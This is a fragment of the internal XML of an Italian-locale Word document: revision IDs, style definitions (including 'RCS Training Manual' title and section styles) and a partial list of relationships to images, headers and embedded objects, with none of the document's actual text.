    <w:rsid w:val="00BF3A82"/>
    <w:rsid w:val="00BF3BB3"/>
    <w:rsid w:val="00BF3E89"/>
    <w:rsid w:val="00BF5C59"/>
    <w:rsid w:val="00BF77FA"/>
    <w:rsid w:val="00C00D75"/>
    <w:rsid w:val="00C07383"/>
    <w:rsid w:val="00C11CD3"/>
    <w:rsid w:val="00C1486E"/>
    <w:rsid w:val="00C164D4"/>
    <w:rsid w:val="00C16B3C"/>
    <w:rsid w:val="00C24E39"/>
    <w:rsid w:val="00C2730F"/>
    <w:rsid w:val="00C30459"/>
    <w:rsid w:val="00C32F54"/>
    <w:rsid w:val="00C37A55"/>
    <w:rsid w:val="00C4027E"/>
    <w:rsid w:val="00C41519"/>
    <w:rsid w:val="00C42B9E"/>
    <w:rsid w:val="00C44682"/>
    <w:rsid w:val="00C45694"/>
    <w:rsid w:val="00C467C8"/>
    <w:rsid w:val="00C50CE7"/>
    <w:rsid w:val="00C50EE7"/>
    <w:rsid w:val="00C5322E"/>
    <w:rsid w:val="00C553D6"/>
    <w:rsid w:val="00C604D0"/>
    <w:rsid w:val="00C61678"/>
    <w:rsid w:val="00C6266F"/>
    <w:rsid w:val="00C6270B"/>
    <w:rsid w:val="00C65928"/>
    <w:rsid w:val="00C7119C"/>
    <w:rsid w:val="00C7436F"/>
    <w:rsid w:val="00C74709"/>
    <w:rsid w:val="00C75F9B"/>
    <w:rsid w:val="00C77B8A"/>
    <w:rsid w:val="00C77BE5"/>
    <w:rsid w:val="00C813BF"/>
    <w:rsid w:val="00C81573"/>
    <w:rsid w:val="00C81ED5"/>
    <w:rsid w:val="00C86811"/>
    <w:rsid w:val="00C87FEC"/>
    <w:rsid w:val="00C91870"/>
    <w:rsid w:val="00C93347"/>
    <w:rsid w:val="00C949DB"/>
    <w:rsid w:val="00C96D2F"/>
    <w:rsid w:val="00C9792B"/>
    <w:rsid w:val="00CA4C9E"/>
    <w:rsid w:val="00CA57D2"/>
    <w:rsid w:val="00CA67D2"/>
    <w:rsid w:val="00CB0056"/>
    <w:rsid w:val="00CB0AA2"/>
    <w:rsid w:val="00CB5883"/>
    <w:rsid w:val="00CB7D48"/>
    <w:rsid w:val="00CC5E23"/>
    <w:rsid w:val="00CD10EB"/>
    <w:rsid w:val="00CD39BE"/>
    <w:rsid w:val="00CD4236"/>
    <w:rsid w:val="00CD4AC0"/>
    <w:rsid w:val="00CD4CB6"/>
    <w:rsid w:val="00CD78D4"/>
    <w:rsid w:val="00CE0733"/>
    <w:rsid w:val="00CE07E2"/>
    <w:rsid w:val="00CE07EB"/>
    <w:rsid w:val="00CE0A58"/>
    <w:rsid w:val="00CE1313"/>
    <w:rsid w:val="00CE3125"/>
    <w:rsid w:val="00CE38A8"/>
    <w:rsid w:val="00CE742F"/>
    <w:rsid w:val="00CE787D"/>
    <w:rsid w:val="00CF085B"/>
    <w:rsid w:val="00CF089B"/>
    <w:rsid w:val="00CF0E1F"/>
    <w:rsid w:val="00CF2D90"/>
    <w:rsid w:val="00CF4942"/>
    <w:rsid w:val="00CF6B8C"/>
    <w:rsid w:val="00D0302E"/>
    <w:rsid w:val="00D03E79"/>
    <w:rsid w:val="00D056EB"/>
    <w:rsid w:val="00D05DAA"/>
    <w:rsid w:val="00D1153F"/>
    <w:rsid w:val="00D13AAE"/>
    <w:rsid w:val="00D14A15"/>
    <w:rsid w:val="00D15763"/>
    <w:rsid w:val="00D17789"/>
    <w:rsid w:val="00D20BED"/>
    <w:rsid w:val="00D21782"/>
    <w:rsid w:val="00D21D45"/>
    <w:rsid w:val="00D2534D"/>
    <w:rsid w:val="00D269BE"/>
    <w:rsid w:val="00D274A8"/>
    <w:rsid w:val="00D27749"/>
    <w:rsid w:val="00D278B6"/>
    <w:rsid w:val="00D27D20"/>
    <w:rsid w:val="00D36233"/>
    <w:rsid w:val="00D36733"/>
    <w:rsid w:val="00D47F85"/>
    <w:rsid w:val="00D52F90"/>
    <w:rsid w:val="00D539C3"/>
    <w:rsid w:val="00D53DE1"/>
    <w:rsid w:val="00D560FB"/>
    <w:rsid w:val="00D618FA"/>
    <w:rsid w:val="00D63D31"/>
    <w:rsid w:val="00D641D7"/>
    <w:rsid w:val="00D65BA7"/>
    <w:rsid w:val="00D661E2"/>
    <w:rsid w:val="00D665D2"/>
    <w:rsid w:val="00D6693D"/>
    <w:rsid w:val="00D675C5"/>
    <w:rsid w:val="00D732A2"/>
    <w:rsid w:val="00D7493F"/>
    <w:rsid w:val="00D76804"/>
    <w:rsid w:val="00D80079"/>
    <w:rsid w:val="00D80307"/>
    <w:rsid w:val="00D84282"/>
    <w:rsid w:val="00D8502A"/>
    <w:rsid w:val="00D86157"/>
    <w:rsid w:val="00D8707E"/>
    <w:rsid w:val="00D915CC"/>
    <w:rsid w:val="00D918C0"/>
    <w:rsid w:val="00D91989"/>
    <w:rsid w:val="00D92909"/>
    <w:rsid w:val="00D9362E"/>
    <w:rsid w:val="00D93760"/>
    <w:rsid w:val="00D95746"/>
    <w:rsid w:val="00D96EE4"/>
    <w:rsid w:val="00DA0011"/>
    <w:rsid w:val="00DA06EB"/>
    <w:rsid w:val="00DA3CC8"/>
    <w:rsid w:val="00DA7E05"/>
    <w:rsid w:val="00DB04C5"/>
    <w:rsid w:val="00DB05AC"/>
    <w:rsid w:val="00DB1248"/>
    <w:rsid w:val="00DB26F5"/>
    <w:rsid w:val="00DB2837"/>
    <w:rsid w:val="00DB2F18"/>
    <w:rsid w:val="00DB5ABA"/>
    <w:rsid w:val="00DC051C"/>
    <w:rsid w:val="00DC4419"/>
    <w:rsid w:val="00DC49F7"/>
    <w:rsid w:val="00DC52B1"/>
    <w:rsid w:val="00DC5780"/>
    <w:rsid w:val="00DC6876"/>
    <w:rsid w:val="00DD03C9"/>
    <w:rsid w:val="00DD0447"/>
    <w:rsid w:val="00DD31ED"/>
    <w:rsid w:val="00DD589C"/>
    <w:rsid w:val="00DD78A8"/>
    <w:rsid w:val="00DE14D1"/>
    <w:rsid w:val="00DE14F7"/>
    <w:rsid w:val="00DE41D2"/>
    <w:rsid w:val="00DE62FA"/>
    <w:rsid w:val="00DE79FD"/>
    <w:rsid w:val="00DE7CEC"/>
    <w:rsid w:val="00DF474F"/>
    <w:rsid w:val="00DF782C"/>
    <w:rsid w:val="00E0174E"/>
    <w:rsid w:val="00E03217"/>
    <w:rsid w:val="00E03B26"/>
    <w:rsid w:val="00E11F83"/>
    <w:rsid w:val="00E11FFE"/>
    <w:rsid w:val="00E12326"/>
    <w:rsid w:val="00E14BDC"/>
    <w:rsid w:val="00E1565C"/>
    <w:rsid w:val="00E1590E"/>
    <w:rsid w:val="00E17308"/>
    <w:rsid w:val="00E1736E"/>
    <w:rsid w:val="00E23AB9"/>
    <w:rsid w:val="00E243D1"/>
    <w:rsid w:val="00E251C3"/>
    <w:rsid w:val="00E25A89"/>
    <w:rsid w:val="00E26F92"/>
    <w:rsid w:val="00E275B2"/>
    <w:rsid w:val="00E30A07"/>
    <w:rsid w:val="00E32205"/>
    <w:rsid w:val="00E34027"/>
    <w:rsid w:val="00E417AD"/>
    <w:rsid w:val="00E50610"/>
    <w:rsid w:val="00E512A6"/>
    <w:rsid w:val="00E526EF"/>
    <w:rsid w:val="00E5427F"/>
    <w:rsid w:val="00E54AAF"/>
    <w:rsid w:val="00E551CB"/>
    <w:rsid w:val="00E558AB"/>
    <w:rsid w:val="00E55AA9"/>
    <w:rsid w:val="00E57195"/>
    <w:rsid w:val="00E576D3"/>
    <w:rsid w:val="00E62E16"/>
    <w:rsid w:val="00E63190"/>
    <w:rsid w:val="00E64C3B"/>
    <w:rsid w:val="00E6766F"/>
    <w:rsid w:val="00E721EE"/>
    <w:rsid w:val="00E7741D"/>
    <w:rsid w:val="00E80798"/>
    <w:rsid w:val="00E82461"/>
    <w:rsid w:val="00E8321E"/>
    <w:rsid w:val="00E835A0"/>
    <w:rsid w:val="00E838E1"/>
    <w:rsid w:val="00E8433A"/>
    <w:rsid w:val="00E944C9"/>
    <w:rsid w:val="00EA1C9B"/>
    <w:rsid w:val="00EA1EC3"/>
    <w:rsid w:val="00EA1F13"/>
    <w:rsid w:val="00EA310D"/>
    <w:rsid w:val="00EA3534"/>
    <w:rsid w:val="00EB0391"/>
    <w:rsid w:val="00EB07A6"/>
    <w:rsid w:val="00EB1082"/>
    <w:rsid w:val="00EB1436"/>
    <w:rsid w:val="00EB3EA6"/>
    <w:rsid w:val="00EB439F"/>
    <w:rsid w:val="00EB4FF7"/>
    <w:rsid w:val="00EC4D7A"/>
    <w:rsid w:val="00EC6F13"/>
    <w:rsid w:val="00ED07E3"/>
    <w:rsid w:val="00ED3685"/>
    <w:rsid w:val="00ED6139"/>
    <w:rsid w:val="00EE0A3E"/>
    <w:rsid w:val="00EE28E5"/>
    <w:rsid w:val="00EE396B"/>
    <w:rsid w:val="00EE3A49"/>
    <w:rsid w:val="00EE7ABA"/>
    <w:rsid w:val="00EF04B9"/>
    <w:rsid w:val="00EF1EE5"/>
    <w:rsid w:val="00EF348A"/>
    <w:rsid w:val="00EF355F"/>
    <w:rsid w:val="00EF3D51"/>
    <w:rsid w:val="00EF6281"/>
    <w:rsid w:val="00F008EB"/>
    <w:rsid w:val="00F04B48"/>
    <w:rsid w:val="00F079E8"/>
    <w:rsid w:val="00F10C2C"/>
    <w:rsid w:val="00F11436"/>
    <w:rsid w:val="00F11ACD"/>
    <w:rsid w:val="00F15855"/>
    <w:rsid w:val="00F15A53"/>
    <w:rsid w:val="00F2249F"/>
    <w:rsid w:val="00F2261C"/>
    <w:rsid w:val="00F2288F"/>
    <w:rsid w:val="00F2314A"/>
    <w:rsid w:val="00F2317A"/>
    <w:rsid w:val="00F2463F"/>
    <w:rsid w:val="00F25C6C"/>
    <w:rsid w:val="00F26FAC"/>
    <w:rsid w:val="00F270AB"/>
    <w:rsid w:val="00F2724D"/>
    <w:rsid w:val="00F3013E"/>
    <w:rsid w:val="00F31234"/>
    <w:rsid w:val="00F341E0"/>
    <w:rsid w:val="00F359AE"/>
    <w:rsid w:val="00F37794"/>
    <w:rsid w:val="00F43991"/>
    <w:rsid w:val="00F44B60"/>
    <w:rsid w:val="00F44DC0"/>
    <w:rsid w:val="00F46189"/>
    <w:rsid w:val="00F46227"/>
    <w:rsid w:val="00F51507"/>
    <w:rsid w:val="00F52124"/>
    <w:rsid w:val="00F53068"/>
    <w:rsid w:val="00F54313"/>
    <w:rsid w:val="00F55838"/>
    <w:rsid w:val="00F57903"/>
    <w:rsid w:val="00F57BCA"/>
    <w:rsid w:val="00F62F13"/>
    <w:rsid w:val="00F64671"/>
    <w:rsid w:val="00F66200"/>
    <w:rsid w:val="00F67838"/>
    <w:rsid w:val="00F726AA"/>
    <w:rsid w:val="00F7275D"/>
    <w:rsid w:val="00F72FCD"/>
    <w:rsid w:val="00F73090"/>
    <w:rsid w:val="00F748CD"/>
    <w:rsid w:val="00F75689"/>
    <w:rsid w:val="00F80224"/>
    <w:rsid w:val="00F80A49"/>
    <w:rsid w:val="00F8278D"/>
    <w:rsid w:val="00F82A2C"/>
    <w:rsid w:val="00F857B1"/>
    <w:rsid w:val="00F85B2D"/>
    <w:rsid w:val="00F86940"/>
    <w:rsid w:val="00F86DE5"/>
    <w:rsid w:val="00F87F22"/>
    <w:rsid w:val="00F90ED2"/>
    <w:rsid w:val="00F920F3"/>
    <w:rsid w:val="00F92B36"/>
    <w:rsid w:val="00F95A69"/>
    <w:rsid w:val="00FA0070"/>
    <w:rsid w:val="00FA0ABE"/>
    <w:rsid w:val="00FA1726"/>
    <w:rsid w:val="00FA1D58"/>
    <w:rsid w:val="00FA25BF"/>
    <w:rsid w:val="00FA3D2B"/>
    <w:rsid w:val="00FA535C"/>
    <w:rsid w:val="00FA7939"/>
    <w:rsid w:val="00FA7FD3"/>
    <w:rsid w:val="00FB059A"/>
    <w:rsid w:val="00FB2070"/>
    <w:rsid w:val="00FB348C"/>
    <w:rsid w:val="00FB39EA"/>
    <w:rsid w:val="00FB54F6"/>
    <w:rsid w:val="00FB566F"/>
    <w:rsid w:val="00FB5F57"/>
    <w:rsid w:val="00FB646B"/>
    <w:rsid w:val="00FB7486"/>
    <w:rsid w:val="00FC2E6F"/>
    <w:rsid w:val="00FC58A7"/>
    <w:rsid w:val="00FC7C23"/>
    <w:rsid w:val="00FD294A"/>
    <w:rsid w:val="00FD3D68"/>
    <w:rsid w:val="00FD4CD1"/>
    <w:rsid w:val="00FE0DFD"/>
    <w:rsid w:val="00FE17B6"/>
    <w:rsid w:val="00FE3ECD"/>
    <w:rsid w:val="00FE3FE8"/>
    <w:rsid w:val="00FE558C"/>
    <w:rsid w:val="00FE5B25"/>
    <w:rsid w:val="00FE603E"/>
    <w:rsid w:val="00FE64A2"/>
    <w:rsid w:val="00FE7712"/>
    <w:rsid w:val="00FF125D"/>
    <w:rsid w:val="00FF4166"/>
    <w:rsid w:val="00FF5CE6"/>
    <w:rsid w:val="00FF67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142EAE-42E1-4B0B-984F-85F7C116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954F7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007A77EE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo2Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo3Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00351F5F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>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0110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01105"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Intestazione">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="IntestazioneCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F634E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4819"/>
        <w:tab w:val="right" w:pos="9638"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntestazioneCarattere">
    <w:name w:val="Intestazione Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Intestazione"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002F634E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pidipagina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="PidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F634E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4819"/>
        <w:tab w:val="right" w:pos="9638"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PidipaginaCarattere">
    <w:name w:val="Piè di pagina Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Pidipagina"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002F634E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A16E96"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grigliatabella">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00F079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62523F"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo1Carattere">
    <w:name w:val="Titolo 1 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007A77EE"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolosommario">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titolo1"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006311A1"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="it-IT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006311A1"/>
    <w:pPr>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006311A1"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006311A1"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="RCSTrainingManual-Title">
    <w:name w:val="RCS Training Manual - Title"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="RCSTrainingManual-TitleCarattere"/>
    <w:qFormat/>
    <w:rsid w:val="006311A1"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="RCSTrainingManual-Section">
    <w:name w:val="RCS Training Manual - Section"/>
    <w:basedOn w:val="Intestazione"/>
    <w:link w:val="RCSTrainingManual-SectionCarattere"/>
    <w:qFormat/>
    <w:rsid w:val="006311A1"/>
    <w:pPr>
      <w:ind w:hanging="108"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RCSTrainingManual-TitleCarattere">
    <w:name w:val="RCS Training Manual - Title Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="RCSTrainingManual-Title"/>
    <w:rsid w:val="006311A1"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="660"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RCSTrainingManual-SectionCarattere">
    <w:name w:val="RCS Training Manual - Section Carattere"/>
    <w:basedOn w:val="IntestazioneCarattere"/>
    <w:link w:val="RCSTrainingManual-Section"/>
    <w:rsid w:val="006311A1"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A719CD"/>
    <w:pPr>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo2Carattere">
    <w:name w:val="Titolo 2 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A719CD"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo3Carattere">
    <w:name w:val="Titolo 3 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00351F5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabellagriglia5scura-colore1">
    <w:name w:val="Grid Table 5 Dark Accent 1"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="0003611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1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00CB7D4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elenco3-colore1">
    <w:name w:val="List Table 3 Accent 1"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="00B55CFB"/>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laelenco4-colore1">
    <w:name w:val="List Table 4 Accent 1"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00592C54"/>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image" Target="media/image154.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject62.bin"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject106.bin"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject73.bin"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject89.bin"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject52.bin"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject123.bin"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject134.bin"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject153.bin"/><Relationship Id="rId85" 